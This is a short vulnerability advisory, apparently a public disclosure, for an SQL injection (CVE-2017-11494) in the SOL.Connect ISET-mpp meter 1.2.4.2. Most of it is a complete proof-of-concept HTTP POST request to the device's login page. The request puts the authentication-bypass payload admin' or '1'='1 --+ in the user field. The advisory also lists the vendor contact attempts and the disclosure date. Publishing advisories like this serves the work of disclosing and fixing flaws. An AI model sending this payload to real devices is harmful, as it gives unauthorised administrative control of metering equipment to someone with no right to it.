SOL.Connect ISET-mpp Meter 1.2.4.2 SQL Injection

`Vulnerability type:   
SQL injection, leading to administrative access through authentication bypass.  
  
-----------------------------------  
Product: SOL.Connect ISET-mpp meter  
-----------------------------------  
Affected version: SOL.Connect ISET-mpp meter 1.2.4.2 and possibly earlier  
  
Vulnerable parameter: user  
------------------------  
Credit: Andy Tan  
------------------------  
CVE ID: CVE-2017-11494  
------------------------  
  
================  
Proof of Concept  
================  
HTTP Request:  
POST /_45b4a69e249c1d0ab9772763f3c97e69_/?s=login&o=/_45b4a69e249c1d0ab9772763f3c97e69_/%3fs%3dmain HTTP/1.1  
Host: <IP-address>  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Referer: http://<IP-address>/_45b4a69e249c1d0ab9772763f3c97e69_/?s=login&o=/_45b4a69e249c1d0ab9772763f3c97e69_/%3fs%3dmain  
Connection: close  
Upgrade-Insecure-Requests: 1  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 131  
  
action=submit&origin=%2F_45b4a69e249c1d0ab9772763f3c97e69_%2F%3Fs%3Dmain&s=login&user=admin%27+or+%271%27%3D%271+--%2B&password=asd  
  
------------------------  
Vendor contact timeline:  
------------------------  
2017-07-20: Contacted vendor. No response.  
2017-07-26: Contacted vendor again. No response.  
2017-08-01: Public disclosure.  
`